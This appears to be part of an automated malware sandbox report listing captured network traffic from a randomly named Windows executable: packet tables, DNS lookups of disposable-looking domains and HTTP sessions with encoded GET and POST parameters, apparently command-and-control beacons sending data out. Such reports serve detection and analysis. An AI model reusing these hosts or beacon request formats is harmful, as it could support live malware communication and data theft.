                                                            Nov 24, 2024 08:14:31.808275938 CET4995980192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:31.927762032 CET804995913.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:14:32.826975107 CET4996780192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:32.946557999 CET804996713.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:14:32.946712017 CET4996780192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:32.961981058 CET4996780192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:33.081538916 CET804996713.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:14:34.049243927 CET804996713.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:14:34.051747084 CET4996780192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:34.464545965 CET4996780192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:34.584183931 CET804996713.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:14:35.483648062 CET4997480192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:35.603177071 CET804997413.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:14:35.603265047 CET4997480192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:35.619338989 CET4997480192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:35.738962889 CET804997413.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:14:35.739007950 CET804997413.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:14:36.792979956 CET804997413.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:14:36.793045998 CET4997480192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:37.120794058 CET4997480192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:37.240283012 CET804997413.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:14:38.139600039 CET4998080192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:38.259099007 CET804998013.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:14:38.259305000 CET4998080192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:38.268861055 CET4998080192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:38.388334036 CET804998013.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:14:39.452709913 CET804998013.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:14:39.452750921 CET804998013.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:14:39.454457045 CET4998080192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:39.455668926 CET4998080192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:14:39.575203896 CET804998013.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:14:45.783289909 CET4998780192.168.2.10107.167.84.42
                                                            Nov 24, 2024 08:14:45.903115988 CET8049987107.167.84.42192.168.2.10
                                                            Nov 24, 2024 08:14:45.903310061 CET4998780192.168.2.10107.167.84.42
                                                            Nov 24, 2024 08:14:45.918659925 CET4998780192.168.2.10107.167.84.42
                                                            Nov 24, 2024 08:14:46.038142920 CET8049987107.167.84.42192.168.2.10
                                                            Nov 24, 2024 08:14:47.154764891 CET8049987107.167.84.42192.168.2.10
                                                            Nov 24, 2024 08:14:47.154863119 CET8049987107.167.84.42192.168.2.10
                                                            Nov 24, 2024 08:14:47.154875994 CET8049987107.167.84.42192.168.2.10
                                                            Nov 24, 2024 08:14:47.155030012 CET4998780192.168.2.10107.167.84.42
                                                            Nov 24, 2024 08:14:47.433361053 CET4998780192.168.2.10107.167.84.42
                                                            Nov 24, 2024 08:14:48.452513933 CET4998880192.168.2.10107.167.84.42
                                                            Nov 24, 2024 08:14:48.572031975 CET8049988107.167.84.42192.168.2.10
                                                            Nov 24, 2024 08:14:48.572278023 CET4998880192.168.2.10107.167.84.42
                                                            Nov 24, 2024 08:14:48.589859962 CET4998880192.168.2.10107.167.84.42
                                                            Nov 24, 2024 08:14:48.709479094 CET8049988107.167.84.42192.168.2.10
                                                            Nov 24, 2024 08:14:49.821301937 CET8049988107.167.84.42192.168.2.10
                                                            Nov 24, 2024 08:14:49.821337938 CET8049988107.167.84.42192.168.2.10
                                                            Nov 24, 2024 08:14:49.821422100 CET8049988107.167.84.42192.168.2.10
                                                            Nov 24, 2024 08:14:49.821494102 CET4998880192.168.2.10107.167.84.42
                                                            Nov 24, 2024 08:14:49.821535110 CET4998880192.168.2.10107.167.84.42
                                                            Nov 24, 2024 08:14:50.105189085 CET4998880192.168.2.10107.167.84.42
                                                            Nov 24, 2024 08:14:51.124243021 CET4998980192.168.2.10107.167.84.42
                                                            Nov 24, 2024 08:14:51.243854046 CET8049989107.167.84.42192.168.2.10
                                                            Nov 24, 2024 08:14:51.243941069 CET4998980192.168.2.10107.167.84.42
                                                            Nov 24, 2024 08:14:51.263487101 CET4998980192.168.2.10107.167.84.42
                                                            Nov 24, 2024 08:14:51.383223057 CET8049989107.167.84.42192.168.2.10
                                                            Nov 24, 2024 08:14:51.383384943 CET8049989107.167.84.42192.168.2.10
                                                            Nov 24, 2024 08:14:52.450073004 CET8049989107.167.84.42192.168.2.10
                                                            Nov 24, 2024 08:14:52.450131893 CET8049989107.167.84.42192.168.2.10
                                                            Nov 24, 2024 08:14:52.450161934 CET8049989107.167.84.42192.168.2.10
                                                            Nov 24, 2024 08:14:52.450186968 CET4998980192.168.2.10107.167.84.42
                                                            Nov 24, 2024 08:14:52.450202942 CET8049989107.167.84.42192.168.2.10
                                                            Nov 24, 2024 08:14:52.450263977 CET4998980192.168.2.10107.167.84.42
                                                            Nov 24, 2024 08:14:52.777169943 CET4998980192.168.2.10107.167.84.42
                                                            Nov 24, 2024 08:14:53.796397924 CET4999080192.168.2.10107.167.84.42
                                                            Nov 24, 2024 08:14:53.916181087 CET8049990107.167.84.42192.168.2.10
                                                            Nov 24, 2024 08:14:53.916480064 CET4999080192.168.2.10107.167.84.42
                                                            Nov 24, 2024 08:14:53.929368973 CET4999080192.168.2.10107.167.84.42
                                                            Nov 24, 2024 08:14:54.049005985 CET8049990107.167.84.42192.168.2.10
                                                            Nov 24, 2024 08:14:55.212100983 CET8049990107.167.84.42192.168.2.10
                                                            Nov 24, 2024 08:14:55.212182999 CET8049990107.167.84.42192.168.2.10
                                                            Nov 24, 2024 08:14:55.212229967 CET8049990107.167.84.42192.168.2.10
                                                            Nov 24, 2024 08:14:55.212394953 CET4999080192.168.2.10107.167.84.42
                                                            Nov 24, 2024 08:14:55.215215921 CET4999080192.168.2.10107.167.84.42
                                                            Nov 24, 2024 08:14:55.334939003 CET8049990107.167.84.42192.168.2.10
                                                            Nov 24, 2024 08:15:00.929764032 CET4999180192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:01.049551964 CET8049991209.74.77.108192.168.2.10
                                                            Nov 24, 2024 08:15:01.049808025 CET4999180192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:01.068685055 CET4999180192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:01.188349009 CET8049991209.74.77.108192.168.2.10
                                                            Nov 24, 2024 08:15:02.331581116 CET8049991209.74.77.108192.168.2.10
                                                            Nov 24, 2024 08:15:02.331676006 CET8049991209.74.77.108192.168.2.10
                                                            Nov 24, 2024 08:15:02.331782103 CET4999180192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:02.574071884 CET4999180192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:03.592736006 CET4999280192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:03.712352037 CET8049992209.74.77.108192.168.2.10
                                                            Nov 24, 2024 08:15:03.712626934 CET4999280192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:03.728972912 CET4999280192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:03.848644018 CET8049992209.74.77.108192.168.2.10
                                                            Nov 24, 2024 08:15:05.065916061 CET8049992209.74.77.108192.168.2.10
                                                            Nov 24, 2024 08:15:05.066054106 CET8049992209.74.77.108192.168.2.10
                                                            Nov 24, 2024 08:15:05.066976070 CET4999280192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:05.230453968 CET4999280192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:06.250300884 CET4999380192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:06.370079041 CET8049993209.74.77.108192.168.2.10
                                                            Nov 24, 2024 08:15:06.370193958 CET4999380192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:06.389189005 CET4999380192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:06.508852005 CET8049993209.74.77.108192.168.2.10
                                                            Nov 24, 2024 08:15:06.508889914 CET8049993209.74.77.108192.168.2.10
                                                            Nov 24, 2024 08:15:07.607530117 CET8049993209.74.77.108192.168.2.10
                                                            Nov 24, 2024 08:15:07.607743979 CET8049993209.74.77.108192.168.2.10
                                                            Nov 24, 2024 08:15:07.607805967 CET4999380192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:07.907182932 CET4999380192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:08.931087017 CET4999480192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:09.050868034 CET8049994209.74.77.108192.168.2.10
                                                            Nov 24, 2024 08:15:09.050987959 CET4999480192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:09.061122894 CET4999480192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:09.180732012 CET8049994209.74.77.108192.168.2.10
                                                            Nov 24, 2024 08:15:10.272936106 CET8049994209.74.77.108192.168.2.10
                                                            Nov 24, 2024 08:15:10.272958994 CET8049994209.74.77.108192.168.2.10
                                                            Nov 24, 2024 08:15:10.273169041 CET4999480192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:10.276249886 CET4999480192.168.2.10209.74.77.108
                                                            Nov 24, 2024 08:15:10.395680904 CET8049994209.74.77.108192.168.2.10
                                                            Nov 24, 2024 08:15:15.712435007 CET4999580192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:15.832197905 CET8049995104.21.44.16192.168.2.10
                                                            Nov 24, 2024 08:15:15.833750010 CET4999580192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:15.848953962 CET4999580192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:15.968602896 CET8049995104.21.44.16192.168.2.10
                                                            Nov 24, 2024 08:15:16.991203070 CET8049995104.21.44.16192.168.2.10
                                                            Nov 24, 2024 08:15:16.991595030 CET8049995104.21.44.16192.168.2.10
                                                            Nov 24, 2024 08:15:16.991662979 CET4999580192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:17.355362892 CET4999580192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:18.380563021 CET4999680192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:18.500355959 CET8049996104.21.44.16192.168.2.10
                                                            Nov 24, 2024 08:15:18.500543118 CET4999680192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:18.515841961 CET4999680192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:18.635412931 CET8049996104.21.44.16192.168.2.10
                                                            Nov 24, 2024 08:15:19.655185938 CET8049996104.21.44.16192.168.2.10
                                                            Nov 24, 2024 08:15:19.655673981 CET8049996104.21.44.16192.168.2.10
                                                            Nov 24, 2024 08:15:19.655807018 CET4999680192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:20.027282953 CET4999680192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:21.046324968 CET4999780192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:21.166006088 CET8049997104.21.44.16192.168.2.10
                                                            Nov 24, 2024 08:15:21.166322947 CET4999780192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:21.181832075 CET4999780192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:21.302249908 CET8049997104.21.44.16192.168.2.10
                                                            Nov 24, 2024 08:15:21.302289009 CET8049997104.21.44.16192.168.2.10
                                                            Nov 24, 2024 08:15:22.273236036 CET8049997104.21.44.16192.168.2.10
                                                            Nov 24, 2024 08:15:22.274786949 CET8049997104.21.44.16192.168.2.10
                                                            Nov 24, 2024 08:15:22.274971962 CET4999780192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:22.683396101 CET4999780192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:23.703007936 CET4999880192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:23.823080063 CET8049998104.21.44.16192.168.2.10
                                                            Nov 24, 2024 08:15:23.823331118 CET4999880192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:23.833026886 CET4999880192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:23.952532053 CET8049998104.21.44.16192.168.2.10
                                                            Nov 24, 2024 08:15:24.989691973 CET8049998104.21.44.16192.168.2.10
                                                            Nov 24, 2024 08:15:24.991065025 CET8049998104.21.44.16192.168.2.10
                                                            Nov 24, 2024 08:15:24.991139889 CET4999880192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:24.994297981 CET4999880192.168.2.10104.21.44.16
                                                            Nov 24, 2024 08:15:25.114098072 CET8049998104.21.44.16192.168.2.10
                                                            Nov 24, 2024 08:15:30.427088022 CET4999980192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:30.546901941 CET804999913.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:15:30.547035933 CET4999980192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:30.564306021 CET4999980192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:30.684062004 CET804999913.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:15:31.696038961 CET804999913.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:15:31.696105957 CET4999980192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:32.074038982 CET4999980192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:32.193727016 CET804999913.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:15:33.093221903 CET5000080192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:33.212821960 CET805000013.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:15:33.213071108 CET5000080192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:33.228332043 CET5000080192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:33.348062992 CET805000013.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:15:34.359693050 CET805000013.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:15:34.359908104 CET5000080192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:34.730261087 CET5000080192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:34.849837065 CET805000013.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:15:35.749305010 CET5000180192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:35.868877888 CET805000113.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:15:35.868974924 CET5000180192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:35.885054111 CET5000180192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:36.004672050 CET805000113.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:15:36.004761934 CET805000113.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:15:37.016793966 CET805000113.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:15:37.016874075 CET5000180192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:37.388024092 CET5000180192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:37.507622957 CET805000113.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:15:38.405735016 CET5000280192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:38.525882006 CET805000213.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:15:38.526264906 CET5000280192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:38.535698891 CET5000280192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:38.655477047 CET805000213.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:15:39.670455933 CET805000213.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:15:39.670525074 CET805000213.248.169.48192.168.2.10
                                                            Nov 24, 2024 08:15:39.670778990 CET5000280192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:39.673729897 CET5000280192.168.2.1013.248.169.48
                                                            Nov 24, 2024 08:15:39.793211937 CET805000213.248.169.48192.168.2.10

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 24, 2024 08:13:43.383071899 CET6478453192.168.2.101.1.1.1
                                                            Nov 24, 2024 08:13:44.370724916 CET6478453192.168.2.101.1.1.1
                                                            Nov 24, 2024 08:13:45.386568069 CET6478453192.168.2.101.1.1.1
                                                            Nov 24, 2024 08:13:45.832931995 CET53647841.1.1.1192.168.2.10
                                                            Nov 24, 2024 08:13:45.832947969 CET53647841.1.1.1192.168.2.10
                                                            Nov 24, 2024 08:13:45.832962990 CET53647841.1.1.1192.168.2.10
                                                            Nov 24, 2024 08:13:58.577953100 CET6386853192.168.2.101.1.1.1
                                                            Nov 24, 2024 08:13:59.573956966 CET6386853192.168.2.101.1.1.1
                                                            Nov 24, 2024 08:13:59.643435955 CET53638681.1.1.1192.168.2.10
                                                            Nov 24, 2024 08:13:59.710750103 CET53638681.1.1.1192.168.2.10
                                                            Nov 24, 2024 08:14:14.984188080 CET4979053192.168.2.101.1.1.1
                                                            Nov 24, 2024 08:14:15.379817009 CET53497901.1.1.1192.168.2.10
                                                            Nov 24, 2024 08:14:29.702469110 CET5846453192.168.2.101.1.1.1
                                                            Nov 24, 2024 08:14:30.159219980 CET53584641.1.1.1192.168.2.10
                                                            Nov 24, 2024 08:14:44.468935013 CET5513353192.168.2.101.1.1.1
                                                            Nov 24, 2024 08:14:45.480329990 CET5513353192.168.2.101.1.1.1
                                                            Nov 24, 2024 08:14:45.779037952 CET53551331.1.1.1192.168.2.10
                                                            Nov 24, 2024 08:14:45.779068947 CET53551331.1.1.1192.168.2.10
                                                            Nov 24, 2024 08:15:00.234694958 CET5493653192.168.2.101.1.1.1
                                                            Nov 24, 2024 08:15:00.920823097 CET53549361.1.1.1192.168.2.10
                                                            Nov 24, 2024 08:15:15.282846928 CET6225753192.168.2.101.1.1.1
                                                            Nov 24, 2024 08:15:15.709661961 CET53622571.1.1.1192.168.2.10
                                                            Nov 24, 2024 08:15:30.000231981 CET4931753192.168.2.101.1.1.1
                                                            Nov 24, 2024 08:15:30.424288988 CET53493171.1.1.1192.168.2.10
                                                            Nov 24, 2024 08:15:45.187280893 CET5132053192.168.2.101.1.1.1
                                                            Nov 24, 2024 08:15:46.183418036 CET5132053192.168.2.101.1.1.1

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Nov 24, 2024 08:13:43.383071899 CET192.168.2.101.1.1.10xf349Standard query (0)www.funnystory.onlineA (IP address)IN (0x0001)false
                                                            Nov 24, 2024 08:13:44.370724916 CET192.168.2.101.1.1.10xf349Standard query (0)www.funnystory.onlineA (IP address)IN (0x0001)false
                                                            Nov 24, 2024 08:13:45.386568069 CET192.168.2.101.1.1.10xf349Standard query (0)www.funnystory.onlineA (IP address)IN (0x0001)false
                                                            Nov 24, 2024 08:13:58.577953100 CET192.168.2.101.1.1.10x31e1Standard query (0)www.nartex-uf.onlineA (IP address)IN (0x0001)false
                                                            Nov 24, 2024 08:13:59.573956966 CET192.168.2.101.1.1.10x31e1Standard query (0)www.nartex-uf.onlineA (IP address)IN (0x0001)false
                                                            Nov 24, 2024 08:14:14.984188080 CET192.168.2.101.1.1.10x2bc2Standard query (0)www.aktmarket.xyzA (IP address)IN (0x0001)false
                                                            Nov 24, 2024 08:14:29.702469110 CET192.168.2.101.1.1.10x18efStandard query (0)www.a1shop.shopA (IP address)IN (0x0001)false
                                                            Nov 24, 2024 08:14:44.468935013 CET192.168.2.101.1.1.10x9831Standard query (0)www.cssa.auctionA (IP address)IN (0x0001)false
                                                            Nov 24, 2024 08:14:45.480329990 CET192.168.2.101.1.1.10x9831Standard query (0)www.cssa.auctionA (IP address)IN (0x0001)false
                                                            Nov 24, 2024 08:15:00.234694958 CET192.168.2.101.1.1.10xdcedStandard query (0)www.urbanxplore.infoA (IP address)IN (0x0001)false
                                                            Nov 24, 2024 08:15:15.282846928 CET192.168.2.101.1.1.10x982dStandard query (0)www.3kw40881107247y.clickA (IP address)IN (0x0001)false
                                                            Nov 24, 2024 08:15:30.000231981 CET192.168.2.101.1.1.10x3712Standard query (0)www.heliopsis.xyzA (IP address)IN (0x0001)false
                                                            Nov 24, 2024 08:15:45.187280893 CET192.168.2.101.1.1.10xc9b5Standard query (0)www.mdpc7.topA (IP address)IN (0x0001)false
                                                            Nov 24, 2024 08:15:46.183418036 CET192.168.2.101.1.1.10xc9b5Standard query (0)www.mdpc7.topA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Nov 24, 2024 08:13:45.832931995 CET1.1.1.1192.168.2.100xf349No error (0)www.funnystory.onlinefunnystory.onlineCNAME (Canonical name)IN (0x0001)false
                                                            Nov 24, 2024 08:13:45.832931995 CET1.1.1.1192.168.2.100xf349No error (0)funnystory.online172.104.82.74A (IP address)IN (0x0001)false
                                                            Nov 24, 2024 08:13:45.832947969 CET1.1.1.1192.168.2.100xf349No error (0)www.funnystory.onlinefunnystory.onlineCNAME (Canonical name)IN (0x0001)false
                                                            Nov 24, 2024 08:13:45.832947969 CET1.1.1.1192.168.2.100xf349No error (0)funnystory.online172.104.82.74A (IP address)IN (0x0001)false
                                                            Nov 24, 2024 08:13:45.832962990 CET1.1.1.1192.168.2.100xf349No error (0)www.funnystory.onlinefunnystory.onlineCNAME (Canonical name)IN (0x0001)false
                                                            Nov 24, 2024 08:13:45.832962990 CET1.1.1.1192.168.2.100xf349No error (0)funnystory.online172.104.82.74A (IP address)IN (0x0001)false
                                                            Nov 24, 2024 08:13:59.643435955 CET1.1.1.1192.168.2.100x31e1No error (0)www.nartex-uf.online31.31.196.177A (IP address)IN (0x0001)false
                                                            Nov 24, 2024 08:13:59.710750103 CET1.1.1.1192.168.2.100x31e1No error (0)www.nartex-uf.online31.31.196.177A (IP address)IN (0x0001)false
                                                            Nov 24, 2024 08:14:15.379817009 CET1.1.1.1192.168.2.100x2bc2No error (0)www.aktmarket.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                            Nov 24, 2024 08:14:15.379817009 CET1.1.1.1192.168.2.100x2bc2No error (0)www.aktmarket.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                            Nov 24, 2024 08:14:30.159219980 CET1.1.1.1192.168.2.100x18efNo error (0)www.a1shop.shop13.248.169.48A (IP address)IN (0x0001)false
                                                            Nov 24, 2024 08:14:30.159219980 CET1.1.1.1192.168.2.100x18efNo error (0)www.a1shop.shop76.223.54.146A (IP address)IN (0x0001)false
                                                            Nov 24, 2024 08:14:45.779037952 CET1.1.1.1192.168.2.100x9831No error (0)www.cssa.auctioncssa.auctionCNAME (Canonical name)IN (0x0001)false
                                                            Nov 24, 2024 08:14:45.779037952 CET1.1.1.1192.168.2.100x9831No error (0)cssa.auction107.167.84.42A (IP address)IN (0x0001)false
                                                            Nov 24, 2024 08:14:45.779068947 CET1.1.1.1192.168.2.100x9831No error (0)www.cssa.auctioncssa.auctionCNAME (Canonical name)IN (0x0001)false
                                                            Nov 24, 2024 08:14:45.779068947 CET1.1.1.1192.168.2.100x9831No error (0)cssa.auction107.167.84.42A (IP address)IN (0x0001)false
                                                            Nov 24, 2024 08:15:00.920823097 CET1.1.1.1192.168.2.100xdcedNo error (0)www.urbanxplore.info209.74.77.108A (IP address)IN (0x0001)false
                                                            Nov 24, 2024 08:15:15.709661961 CET1.1.1.1192.168.2.100x982dNo error (0)www.3kw40881107247y.click104.21.44.16A (IP address)IN (0x0001)false
                                                            Nov 24, 2024 08:15:15.709661961 CET1.1.1.1192.168.2.100x982dNo error (0)www.3kw40881107247y.click172.67.192.207A (IP address)IN (0x0001)false
                                                            Nov 24, 2024 08:15:30.424288988 CET1.1.1.1192.168.2.100x3712No error (0)www.heliopsis.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                            Nov 24, 2024 08:15:30.424288988 CET1.1.1.1192.168.2.100x3712No error (0)www.heliopsis.xyz76.223.54.146A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • www.funnystory.online
                                                            • www.nartex-uf.online
                                                            • www.aktmarket.xyz
                                                            • www.a1shop.shop
                                                            • www.cssa.auction
                                                            • www.urbanxplore.info
                                                            • www.3kw40881107247y.click
                                                            • www.heliopsis.xyz

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.1049853172.104.82.74806048C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 24, 2024 08:13:45.982008934 CET405OUTGET /2dyu/?9HaD=bADo+7fqvlD2EEl6eQvhi6r6MxrwZqr7unPyaN6ymuSYop7wnq2+HbU7S+lsr3BB8s+/OWm3f+6bBn12YfZxgjGy6pWaqu2XlCfxhX0HPUcroLTQDQ==&wdv4=1RD4 HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.funnystory.online
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Nov 24, 2024 08:13:48.541435957 CET519INHTTP/1.1 301 Moved Permanently
                                                            Date: Sun, 24 Nov 2024 07:13:47 GMT
                                                            Server: Apache
                                                            X-Powered-By: PHP/8.2.25
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            X-Redirect-By: WordPress
                                                            Upgrade: h2,h2c
                                                            Connection: Upgrade, close
                                                            Location: http://funnystory.online/2dyu/?9HaD=bADo+7fqvlD2EEl6eQvhi6r6MxrwZqr7unPyaN6ymuSYop7wnq2+HbU7S+lsr3BB8s+/OWm3f+6bBn12YfZxgjGy6pWaqu2XlCfxhX0HPUcroLTQDQ==&wdv4=1RD4
                                                            Transfer-Encoding: chunked
                                                            Content-Type: text/html; charset=UTF-8
                                                            Nov 24, 2024 08:13:48.549774885 CET5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.104988431.31.196.177806048C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 24, 2024 08:13:59.781732082 CET675OUTPOST /9ul0/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.nartex-uf.online
                                                            Origin: http://www.nartex-uf.online
                                                            Referer: http://www.nartex-uf.online/9ul0/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 193
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Raw: 39 48 61 44 3d 79 2b 4d 38 68 6c 52 67 59 6e 6c 63 79 36 4f 63 6a 6a 54 68 4e 46 66 53 4c 6a 2f 79 70 51 33 33 52 7a 68 65 4f 42 45 65 77 61 72 61 41 43 64 41 55 31 52 42 65 56 49 6b 56 5a 6a 65 73 4f 35 32 37 68 6b 4e 72 77 6a 7a 65 6c 68 72 6e 75 30 38 67 43 6b 4e 63 79 63 45 4b 53 47 66 31 4c 44 2f 41 35 55 43 5a 58 6b 47 31 53 6f 4a 4d 53 33 61 57 45 4f 47 73 6b 78 6f 76 61 56 71 59 44 74 33 57 42 44 77 6b 65 4c 48 35 6c 43 30 43 31 6b 66 67 41 33 43 77 2b 4f 50 72 47 47 45 70 54 4f 74 75 4c 6f 53 6d 70 68 71 52 30 4a 64 6b 32 6e 70 6f 71 58 59 39 52 64 6c 61 4c 31 69
                                                            Data Ascii: 9HaD=y+M8hlRgYnlcy6OcjjThNFfSLj/ypQ33RzheOBEewaraACdAU1RBeVIkVZjesO527hkNrwjzelhrnu08gCkNcycEKSGf1LD/A5UCZXkG1SoJMS3aWEOGskxovaVqYDt3WBDwkeLH5lC0C1kfgA3Cw+OPrGGEpTOtuLoSmphqR0Jdk2npoqXY9RdlaL1i
                                                            Nov 24, 2024 08:14:01.222702980 CET1236INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Sun, 24 Nov 2024 07:14:00 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip
